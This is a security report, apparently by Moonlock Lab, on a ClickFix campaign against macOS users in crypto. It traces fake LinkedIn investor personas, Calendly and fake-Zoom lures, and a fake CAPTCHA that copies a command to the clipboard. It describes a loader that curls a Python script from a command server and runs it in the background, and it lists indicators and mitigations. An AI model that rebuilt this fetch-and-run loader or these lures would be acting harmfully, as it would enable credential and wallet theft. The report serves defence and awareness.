No malware. No vulnerability exploit. No online web downloads. ClickFix attacks, which have become increasingly popular among cybercriminals, are breaching Mac computers in big numbers. Their success, and their weakest point? Tricking users themselves into connecting their Macs to a malicious criminal network.
Once connected to the criminal network, the attackers gain full privilege and access, establish a communication channel, and deploy a series of payloads that steal data and crypto wallet credentials. This multi-stage loader attack uses macOS’s own language to appear legitimate and raise no flags. It has become a popular and standard technique among criminals who are moving away from standalone malware file downloads.
In this report, we look into why new ClickFix techniques are popular and successful. We also dive deep into a case example of a recent campaign discovered in the wild by the Moonlock Lab Team, which shares notable characteristics with the North Korean state-supported hacker campaign known as Contagious Interview.
ClickFix: Who Criminals Target, and Why They are Popular in the Dark Web
In 2024, Microsoft reported that ClickFix was used as the initial technique in 47% of all attacks they detected. By the first half of 2025,
But what does a ClickFix attack look like from the users’ point of view? And why are they so popular?
The setup is familiar by now: a user lands on a page that looks like a Cloudflare verification, a broken video stream, or a routine browser check. Then the user clicks on the Cloudflare checkbox, and without knowing it, they write a command to their clipboard that sets up the attack.
The fake page then tries to guide users with simple step-by-step instructions on how to open their Mac terminal and paste a script there. All this happens while the ClickFix window displays a countdown timer to create a false sense of urgency.
Who falls for this type of cyberattack? So far, we have seen ClickFix attacks target high-value Mac users who work in the crypto, blockchain, Web3, AI, and software developer industries. However, the technique can be used against any type of user. This is why.
Tech-savvy users, accustomed to using Mac’s terminal script, may see no red flag in pasting a script on their terminal because they are used to doing it, and work with their terminal every day. On the other hand, the average user may think, “Well, this is how professionals fix things, or download advanced software”. This is why ClickFix works on different types of users.
Threat actors love ClickFix because it requires no zero-day, no heavy stand-alone malware file, and can sidestep Endpoint Detection and Response (EDR), antivirus, and Mac’s built-in protection security suite, including Gatekeeper and Apple’s Transparency, Consent, and Control (TCC).
Summarizing, red flags to look out for are:
- Cloudflare or “I’m not a robot” verifications: If you land on a website that asks you to verify that you are not a bot, be cautious. Cybercriminals can hide scripts inside the checkboxes, to, for example, gather information like what OS you are using to later serve you the malware or script that is specific to your OS.
- Step-by-step instructions that include terminal commands: If a site gives you step-by-step instructions on how to copy and paste a script on your Mac terminal, it is likely a ClickFix attack. Do not copy terminal commands on your Mac unless you are 100% sure they are safe.
- ClickfFix variations: There are several variations of ClickFix techniques to look out for. InstallFix attempts to trick users into copying a script to “fix” a browser, driver, webcam, or system issues that do not exist. On the other hand, “Drag and Drop” Clickfix asks users to drag a file directly into the Mac terminal. Not all ClickFix attacks look the same, so look out for variations.
- Immediate system password: The first thing a multi-stage loader often does is prompt you for your system password. It needs this password to escalate privileges, access, and execute tasks that only the system administrator (you) can execute. Do not type in your password after running a script on your Terminal or after installing any software.
It Starts With a LinkedIn Message: Fake Venture Capital and Blockchain Firms
In their latest investigation, the Moonlock Lab Team found a new
This ClickFix attack starts with a message on LinkedIn. Blockchain industry professionals were contacted with a personalized message by Mykhailo Hureiev, who is listed on LinkedIn as Co-Founder and Managing Partner of SolidBit Capital, a Web3 and DeFi-focused investment firm.
The message and the LinkedIn contact link appear legitimate but are fake and fabricated by the attacker. The personalized message references projects that those who were contacted actually work on. This gives the message a more human and professional opportunity, establishing trust.
The message then opens the door to a fake potential employment or work role opportunity and casually invites users to schedule a call via the legitimate Calendly app. As seen in the image below.
The Calendly link used by the attacker in this case is: calendly[.]com/hureivemykhail/with-solidbit-meeting. Which as mentioned above, is leveraging legitimate
Besides Calendly.com links, users were offered by the cybercriminals links to fake Zoom meetings and fake Google meetings, again abusing known brands to establish fake legitimacy.
Another fake persona linked to this campaign, which we found through Whois service research when checking registrants of the malicious domain, is Antolli Bigdasch. Our online search revealed that Antolli Bigdasch is also listed as the founder of SolidBit Capital, the same entity that Mykhailo Hureiev claims to represent when engaging victims on LinkedIn.
Users who clicked on Calendly, chose a date, time, and filled in their personal data, including name and email, appear to have later received a fake Google Meet or Zoom Meet link where a ClickFix technique delivered the malicious multi-stage loader.
As the image above shows, the IoC calendly[.]com/hureivemykhail/with-solidbit-meeting, still active when this report was being written, prompted users to schedule a date and time, and then asked them to fill in personal data in the form seen above, including Name, Email, and Comments.
A Broader Industrialized Campaign and Infrastructure
Besides the fake personas, the Moonlock Lab team found that attackers, leveraging AI, created a series of fabricated online company identities. This includes the fake SolidBit, MegaBit, and Lumax Capital VC firms.
As mentioned, SolidBit Capital is the identity tied to the Bigdasch registrant and the Mykhailo Hureiev LinkedIn persona.
MegaBit is an additional fake company discovered on the campaign infrastructure. Hosted on the fake Zoom domain at zoom[.]07usweb[.]us/homepage/, the site presents itself as an investment firm. The site presents a polished dark-themed frontend, navigation tabs (Portfolio, About Us, Focus, Team, Contact Us, and Login), and an “Investment Team” page featuring four individuals, all displayed with AI-generated headshot photos.
The domain variant (07usweb[.]us vs. us07-web[.]us) confirms that this is the same operator rotating infrastructure identifiers while reusing the core naming pattern.
We also found that attackers had recently created a domain to host the fake Lumax Capital page. The Lumax Capital website, live and fully functional, also looks legitimate and professional, with working navigation, multiple tabs, and a fabricated company history.
Note that the headshots in the image above are also AI-generated.
What Happens When Users Schedule a Meeting with the Attackers?
Now that we covered the lures and how attackers create rather convincing but fake online companies to establish trust to contact users for fake job offers, let’s look at what happens when a user clicks on the calendar links or interacts with specific malicious sites.
When a victim clicks the fake Zoom or Google Meet link provided by the LinkedIn operator, they are directed to a page that appears to be a legitimate event website. In this case, “The Digital Asset Conference III,” site references a real cryptocurrency event, while “Hedgeweek” is a well-established hedge fund industry news portal widely read by institutional investors, fund managers, and allocators.
Moonlock Lab reached out to Hedgeweek to notify them of the typosquat domain abusing their brand, but did not receive a response at the time of publication.
The attackers overlay the fake pages with a fake Cloudflare-branded verification modal.
When a user clicks on the “I’m not a robot” checkbox, the attacker's page silently runs a JavaScript that writes a malicious command on the user’s clipboard using navigator.clipboard.writeText().
The command is OS-specific. This means the script detects the operating system of the user, via the User-Agent string, and then loads a ClickFix attack that includes a script that matches the user's operating system. Basically, if you are running Windows, you get a Windows OS script, while if you are running a Mac, you get a macOS script. The attack is therefore cross-platform.
The image below shows a ClickFix technique targeting Windows users, but as mentioned, attackers gain knowledge of what OS the user is using when they click on the “I’m not a Robot” checkbox.
Users who copy and paste the script on their terminal will, without knowing it, trigger the cyberattack, which executes stealthily in the background. Users are then redirected to a legitimate site to hide the attack.
While in the past we have observed ClickFix campaigns that infected users with macOS stealers like MacSync, this campaign is different.
On macOS, the bash one-liner checks for Python 3, installs Homebrew from raw.githubusercontent.com if needed, weaponizing a trusted developer tool as cover. It then pulls a Python script from the same C2 via curl -H "User-Agent: macintosh", saves it to /tmp/hduwhv.py, and runs it under “nohup bash &” so it persists after the terminal closes.
A Technical Deep Dive into the macOS Payload
The fake Zoom app (SHA-256: 755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323), first flagged by
Once those impacted type in their credentials, these are captured and exfiltrated to a Telegram bot. The payload server at zoom[.]us05-web[.]us served macOS, Windows, and Linux payloads from the same endpoint via a numeric parameter.
Moonlock Lab
|
Property |
Obfuscated version |
Non-obfuscated version |
|---|---|---|
|
SHA-256 |
9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6 |
2fbd34eed9dbf57a44cf1540941fb43a793be27e13e937299167b2b67cb84d6b |
|
File size |
9.3 MB |
37.6 KB |
Both samples perform the same core functions: retrieving a temporary directory path, downloading files from a remote server, re-signing them with ad-hoc code signatures, and executing them. The critical difference is in their construction:
The obfuscated version (9.3 MB) is inflated with garbage instructions distributed across two binary segments. This junk code is designed to bypass static analysis tools. Disassemblers like Ghidra struggle to process the binary efficiently, making quick triage impractical.
A scan on VirusTotal revealed that the sample itself was undetected by all major security engines at the time of discovery.
The non-obfuscated version (37.6 KB) contains the same functional logic without the padding. It appears to be either a development build or an earlier iteration of the payload. Again, this sample was also undetected by most major security engines on VirusTotal at the time of discovery.
Why both versions were uploaded to VirusTotal remains unclear. Both achieved zero detections across all vendors for an extended period after submission, demonstrating that the threat actors have invested in evasion techniques that effectively bypass current static analysis heuristics.
Attribution: A Signature That's Been Seen Before
On February 9, 2026, Mandiant
|
Element |
This campaign |
Mandiant / UNC1069 |
|---|---|---|
|
Fake Zoom domain |
zoom[.]us07-web[.]us |
zoom[.]uswe05[.]us |
|
Domain pattern |
zoom.us{XX}-web.us |
zoom.uswe{XX}.us |
|
Social engineering |
LinkedIn → Calendly → fake Zoom |
Telegram → Calendly → fake Zoom |
|
Delivery |
ClickFix (fake Cloudflare CAPTCHA) |
ClickFix (fake audio troubleshooting) |
|
OS targeting |
macOS + Windows |
macOS + Windows |
|
Target sector |
Crypto / Web3 |
Crypto startups, developers |
The domain naming pattern — zoom.us{XX}-web.us vs. zoom.uswe{XX}.us — is not coincidental. Definitive attribution remains open, but the tradecraft overlap is documented. This is what a DPRK-adjacent playbook looks like when it runs through a polished social engineering layer.
Recommendations and Mitigation Actions for Users
ClickFix campaigns reach the terminal stage because everything before it, including the LinkedIn message, the Calendly link, and the polished company website, has already cleared the target's informal trust threshold. By the time the CAPTCHA appears, skepticism is spent. Despite its sophistication and the weaponization of macOS’s own processes and language, there are still several things any user can do to stay safe from this cyberattack.
Know the Risks of Running Scripts on Your Mac Terminal
Whether you are a technically well-versed user or not, by understanding the risks of running scripts on your Mac terminal, you can strengthen your cybersecurity. Apple itself appears to be trying to raise awareness on the risks of terminal commands with a new feature that warns users about the risks of pasting scripts in their terminal. The feature is reported to be working only on macOS Tahoe 26.4, and Apple has released no official press release on how it works, or if they have plans to make this feature standard across all macOS versions, which would be a much-welcomed and useful addition if released across the board.
If a Script Looks Like Gibberish, It’s Probably Malicious
Legitimate terminal macOS scripts are transparent and readable. If you come across a terminal script that looks like random letters, numbers, and symbols, this means it has been scrambled to hide something and is probably malicious.
Eval and base 64 --decode: Red Flag Commands
If you see a script that contains commands eval, bash, or base64 --decode, do not run it on your terminal. The command eval gives a script permission to "run whatever follows as a program." This is not normal or used in safe scripts. The command base64 --decode, found at the end of the scripts, is the scrambler, and why you see the script as a random string of letters instead of what it actually says.
Verify Job Offers
Unfortunately, in this day and age, if you get a job offer, you have to double-check and verify everything, and once you are done with that, do it again. Cybercriminals, from nation-state-supported actors to common scammers, are constantly preying on the job market and are well-resourced and skilled at what they do. Criminals have also embraced AI, which allows them to create fake pages and fake personas in just minutes. Applying zero trust and checking everything not twice but three times is highly recommended.
Here are the steps you can take to stay safe:
- Verify the company. Check when the domain was registered, review the company’s digital footprint, and look closely at team photos or biographies that may be AI-generated or recently fabricated.
- Be cautious if a conversation quickly moves off LinkedIn. If the sender insists on using their Zoom, Calendly, or Google Meet, run those external links through a URL checking tool.
- Treat urgency as a red flag. Pressure to schedule quickly, move to private channels, or follow specific technical instructions to change settings on your device is often a key part of the manipulation.
- Never paste commands into your terminal. No legitimate service will require you to open your terminal and run a command as part of a verification process.
The rule of thumb is to pause before doing anything you don’t fully understand. If a step feels unusual for a job interview, a partnership call, or an investment discussion, it probably is.
Conclusion
ClickFix attacks and multi-stage loaders, combined with sophisticated AI-driven social engineering, have become a golden standard in the dark web. Cybercriminals tend to stick with what works, so know that these techniques are likely to evolve and not disappear. What exactly the next ClickFix technique will look like is still unknown, but by understanding how the cyberattack works, you can build up your security posture.